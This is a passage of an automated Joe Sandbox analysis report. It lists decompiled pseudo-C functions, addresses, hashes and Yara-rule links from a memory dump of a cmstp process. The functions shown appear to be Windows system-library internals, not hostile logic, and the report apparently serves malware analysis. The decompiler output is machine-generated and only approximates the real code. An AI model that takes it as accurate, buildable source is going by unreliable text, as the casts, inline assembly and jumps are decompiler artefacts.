								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x51c84c4; // 0x0
					L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x05103b89
0x05103b96
0x05103ba1
0x05103bab
0x05103bb5
0x05103bb9
0x05146298
0x05103bbf
0x05103bc2
0x05103bc3
0x05103bc9
0x05103bca
0x05103bcc
0x05103bcd
0x05103bd4
0x05103bd6
0x05103bdb
0x05103bea
0x05103bf7
0x05103bfb
0x05103bff
0x05103c09
0x05103c0a
0x05103c0b
0x05103c0f
0x05103c14
0x05103c18
0x05103c18
0x05103bfb
0x05103c1b
0x05103c30
0x05103c30
0x05103c3d

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ab9d44ef31886650d76eb4b182de05cf7c468843a8bf2b63f247b4141597b34
Instruction ID: e27ae3726a7688e57babdc115272b145927a8e2075409cee3ac3ec87082aa004
Opcode Fuzzy Hash: 2ab9d44ef31886650d76eb4b182de05cf7c468843a8bf2b63f247b4141597b34
Instruction Fuzzy Hash: 5B21B072600104BFD700DF58DE81F6ABBBDFB40318F2504A9E908AB291D772AD418B90

Uniqueness

Uniqueness Score: -1.00%

Function 05156CF0 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E05156CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E050F7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E050F7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x50b5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0510F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0510F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E05157016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L050F2400( &_v52);
								}
								_t21 = L050F2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x05156cfb
0x05156d00
0x05156d02
0x05156d06
0x05156d0a
0x05156d0e
0x05156d19
0x05156d2b
0x05156d1b
0x05156d24
0x05156d24
0x05156d33
0x05156d39
0x05156d46
0x05156d4f
0x05156d61
0x05156d51
0x05156d5a
0x05156d5a
0x05156d69
0x05156d6b
0x05156d6d
0x05156d6f
0x05156d6f
0x05156d74
0x05156d79
0x05156d7a
0x05156d7f
0x05156d82
0x05156d88
0x05156d89
0x05156d90
0x05156d94
0x05156da7
0x05156db1
0x05156db1
0x05156dbb
0x05156dbb
0x05156d90
0x05156d69
0x05156d46
0x05156dc6

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0832f314931124d5f06ea38f6557534cf653fa827d62128a6fc1ad5d23177c5
Instruction ID: dfb27ec8e0c45e7e64d29d14331c05b5693bb6f7b742e1a6bfc8b7462bf146bd
Opcode Fuzzy Hash: c0832f314931124d5f06ea38f6557534cf653fa827d62128a6fc1ad5d23177c5
Instruction Fuzzy Hash: 922100326042449BD721DF28C948BABB7ECEF81260F480856BD90872A1E734D908C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 051A070D Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E051A070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E051A07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0519AFDE( &_v8,  &_v12);
					E051A1293(_t38, _v28, _t60);
					if(E050F7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E051914FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x051a071b
0x051a0724
0x051a0734
0x051a0738
0x051a074b
0x051a074b
0x051a0753
0x051a0753
0x051a0759
0x051a075d
0x051a0774
0x051a0779
0x051a077d
0x051a0789
0x051a0795
0x051a07a7
0x051a0797
0x051a07a0
0x051a07a0
0x051a07af
0x051a07c4
0x051a07cd
0x051a07cd
0x051a07af
0x051a07dc

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 15fac03708da9c9747d50fdc3a88a30b249324403533a4192aa5583e5415a29b
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: E321D33B308200AFD716DF58C888A6ABBA5FBC4250F048569F9958B381D730DD09CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05157794 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E05157794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x51c7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L050F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0511F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E050F7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E05119AE0();
					_t24 = L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x05157799
0x0515779a
0x0515779b
0x051577a3
0x051577ab
0x051577ae
0x051577b1
0x051577b1
0x051577bf
0x051577c4
0x051577c8
0x051577ce
0x051577d4
0x051577e0
0x051577e0
0x051577d6
0x051577d6
0x051577de
0x00000000
0x00000000
0x051577de
0x051577e5
0x051577f0
0x051577f3
0x051577f6
0x051577fd
0x05157800
0x0515780c
0x05157818
0x0515782b
0x0515781a
0x05157823
0x05157823
0x05157830
0x05157831
0x05157838
0x0515783d
0x0515783e
0x0515784f
0x0515784f
0x0515785a

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02082f7c61c6dcebff5a76f2c6b93db705a60568ba0af2bdea815a858da31cb4
Instruction ID: 5a9a2c4d5a43e01112bf635f87860938fad8250b064ccd1eebb0c4b887a814dd
Opcode Fuzzy Hash: 02082f7c61c6dcebff5a76f2c6b93db705a60568ba0af2bdea815a858da31cb4
Instruction Fuzzy Hash: EE218E72600604EBC725DF69D894EABBBA9EF48390F100569EA1AC7690D734E900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 050FAE73 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E050FAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E050F7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E050F7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E050F7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E050F7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E05157794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x050fae78
0x050fae7c
0x050fae7e
0x050fae81
0x050fae86
0x050fae8d
0x05142691
0x050fae93
0x050fae93
0x050fae93
0x050fae98
0x050fae9d
0x051426a2
0x051426b4
0x051426a4
0x051426ad
0x051426ad
0x051426b9
0x00000000
0x051426bb
0x00000000
0x051426bb
0x050faea3
0x050faea3
0x050faea3
0x050faeaa
0x051426c0
0x051426c9
0x051426c9
0x050faeb3
0x051426d4
0x051426e1
0x00000000
0x00000000
0x051426e7
0x051426ee
0x051426f0
0x051426f9
0x051426f9
0x05142702
0x05142708
0x05142708
0x0514270b
0x0514270f
0x05142711
0x05142711
0x05142725
0x05142725
0x00000000
0x050faeb9
0x050faeb9
0x050faebf
0x050faebf
0x050faeb3

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 1592bab2ebcd27afda718124001aa04440ee1b1187eba9b749c8fc6cc62ccab0
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 3321C2757056809FD725DB29D948B7977EAFF44390F1900A0EE088BA92D778DC80CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0510FD9B Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0510FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E050E76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L050F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x0510fd9b
0x0510fda0
0x0510fda1
0x0510fdab
0x0510fdad
0x0510fdb0
0x0510fdb8
0x0510fe0f
0x0510fde6
0x0510fde9
0x0510fdec
0x0514c0c0
0x0510fdfe
0x0510fe06
0x0510fe06
0x0514c0c8
0x0510fe2d
0x0510fe2d
0x00000000
0x0510fe2d
0x0514c0d1
0x0514c0e0
0x0514c0e5
0x0514c0e5
0x0514c0e8
0x00000000
0x0514c0e8
0x0510fdf4
0x00000000
0x00000000
0x0510fdf6
0x0510fdfa
0x0510fe1a
0x0510fe1f
0x0510fe1f
0x0510fdfc
0x00000000
0x0510fdfc
0x0510fdcc
0x0510fdd0
0x0510fe26
0x00000000
0x0510fe26
0x0510fdd8
0x0510fddb
0x0510fddd
0x0510fde0
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: f70649f8b01abe4bb3575010cd32c154f1f2aefd58e758bf218c2119844bc2b5
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 8121A97A604A40DFC734CF09C640E66B7E6FB94B10F22906EE94A87A61D770AC42CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0510B390 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0510B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E050F2280(_t12, 0x51c8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E051100C2(0x51c8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x0510b395
0x0510b3a2
0x0510b3a5
0x0510b3aa
0x0510b3b2
0x0510b3ba
0x0510b3bd
0x0510b3c0
0x0510b3c4
0x0510b3c9
0x0514a3e9
0x0514a3ed
0x0514a3f0
0x0514a3ff
0x0514a403
0x0514a409
0x00000000
0x00000000
0x0514a40b
0x0514a40b
0x0514a40f
0x0514a415
0x0514a423
0x0514a423
0x0514a415
0x0510b3d1
0x0510b3e8
0x0510b3e8
0x0510b3d9

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf74dfcd365d2f2ab021d4af640da5c7a09d35e2c8f5ee7c5ba8cad8de0bcf1f
Instruction ID: e2227ce6a446f0ac94c4d966e95faf909b054c54691955c852a3d7f24d2627b6
Opcode Fuzzy Hash: cf74dfcd365d2f2ab021d4af640da5c7a09d35e2c8f5ee7c5ba8cad8de0bcf1f
Instruction Fuzzy Hash: 42118C333051205BCB28DA159E80D6F7267EBC5230B39116DDE169B7C0DF316C02C794

Uniqueness

Uniqueness Score: -1.00%

Function 050D9240 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E050D9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x51af708);
				E0512D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E051195D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E051195D0();
				_t33 =  *0x51c84c4; // 0x0
				L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x51c84c4; // 0x0
				L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x51c84c4; // 0x0
				E050F2280(L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x51c86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E051195D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E051195D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E050D9325();
					_t50 =  *0x51c84c4; // 0x0
					return E0512D0D1(L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x050d9240
0x050d9242
0x050d9247
0x050d924c
0x050d924e
0x050d9255
0x050d9257
0x050d925a
0x050d925f
0x050d925f
0x050d9266
0x050d9271
0x050d9276
0x050d9279
0x050d927e
0x050d9295
0x050d929a
0x050d92b1
0x050d92b6
0x050d92d7
0x050d92dc
0x050d92e0
0x050d92e6
0x050d92e8
0x050d92ee
0x050d9332
0x050d9333
0x050d9337
0x050d9338
0x050d933a
0x050d933a
0x050d933d
0x050d9342
0x050d9342
0x050d9345
0x050d9349
0x050d934e
0x050d9352
0x050d9357
0x050d92f4
0x050d92f4
0x050d92f6
0x050d92f9
0x050d9300
0x050d9306
0x050d9324
0x050d9324

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f612c9bea819b9e28248060ce18c84ca0bf2d10f7ebdc8c5a7a9b3fd947edb59
Instruction ID: 83ecd38a119a0c0c251eeaa0ec2fa298c34b3e0caeaf81a2eb3c024121f5855b
Opcode Fuzzy Hash: f612c9bea819b9e28248060ce18c84ca0bf2d10f7ebdc8c5a7a9b3fd947edb59
Instruction Fuzzy Hash: 87216A31251700EFC762EF68DA44F9ABBF9FF18704F0449A8E10997AA2CB35E941DB54

Uniqueness

Uniqueness Score: -1.00%

Function 05164257 Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E05164257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x51b08d0);
				E0512D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E051641E8(__ebx, __edi, __ecx, _t39);
				E050EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x51c87e4;
					_t18 =  *0x51c87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x51c5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x51c87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x51c87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L050D7055(_t31 + 0xfffffff8);
								_t24 =  *0x51c87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x51c87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x51c5cd0;
				if( *0x51c5cd0 <= 0) {
					L050D7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x51c87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x51c87e8 = _t30;
						 *0x51c87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0512D0D1(L05164320());
			}

0x05164257
0x05164257
0x05164257
0x05164259
0x0516425e
0x05164263
0x05164265
0x05164273
0x05164278
0x0516427c
0x0516427f
0x05164281
0x05164287
0x051642d7
0x051642d7
0x051642da
0x0516428d
0x0516428d
0x0516428f
0x05164292
0x05164297
0x0516429c
0x051642a0
0x051642a6
0x051642a8
0x051642ae
0x051642b3
0x00000000
0x051642ba
0x051642ba
0x051642bf
0x051642c5
0x051642ca
0x051642cf
0x051642d0
0x00000000
0x051642d0
0x051642b3
0x00000000
0x051642a6
0x0516429c
0x051642dc
0x051642dc
0x051642e3
0x05164309
0x051642e5
0x051642e5
0x051642e8
0x051642ee
0x051642f0
0x00000000
0x051642f2
0x051642f2
0x051642f4
0x051642f7
0x051642f9
0x05164300
0x05164300
0x051642f0
0x0516430e
0x0516431f

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6e5194425f3c4afd201331f19316b00f1473d55f095e999dfd1b75135ff420d
Instruction ID: f73ab4a7fa7ffe1be14eba7cd9e75cbd652d44328ce683a70dbc353aefe565f9
Opcode Fuzzy Hash: e6e5194425f3c4afd201331f19316b00f1473d55f095e999dfd1b75135ff420d
Instruction Fuzzy Hash: FF219D71611700EFDB24EF24E085A68BFF2FB85314B6182AEE1459B2D1EB72D4A1CF01

Uniqueness

Uniqueness Score: -1.00%

Function 051546A7 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E051546A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L050F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0511F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
